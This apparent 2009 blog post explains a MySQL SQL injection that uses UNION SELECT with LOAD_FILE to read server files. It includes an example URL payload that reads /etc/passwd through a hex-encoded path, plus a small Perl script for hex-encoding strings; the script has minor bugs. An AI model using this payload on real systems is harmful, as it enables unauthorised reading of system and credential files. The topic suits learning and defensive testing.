MYSQL LOAD_FILE SQL Injection

Written by Tully on July 30, 2009 Categories: MySQL Tags: , ,

So today I was reading up on some SQL injection techniques, and came across one that I had not seen before. I found out that it is possible to use a UNION SELECT with the built-in MYSQL LOAD_FILE function, to read the contents of any file on the system. This only works if the user has been granted permission to use the LOAD_FILE function, and of course MYSQL DAEMON must have permission to read the file. Also, I found out that the LOAD_FILE function can read use with HEX decimal characters.

Example Injection: www.example.com/article.php?id=1+union+select+LOAD_FILE(0x2f6574632f706173737764)

This will return the contents of the /etc/passwd on a linux machine.

I also came across a handy perl script today that will encode a given string into HEX.

Perl HEX converter:

Note: There is a underscore between LOAD and FILE.


print "Enter string to encode:";
$str=<STDIN>;chomp $str;

$enc = encode($str); print "Hex Encoded value: 0x$encn";

sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];

@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {

$encoded = sprintf('%lx',$line);
$encoded_command .= $encoded;

}
return $encoded_command;

}

2 Comments

Related Posts

2 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

«  —  »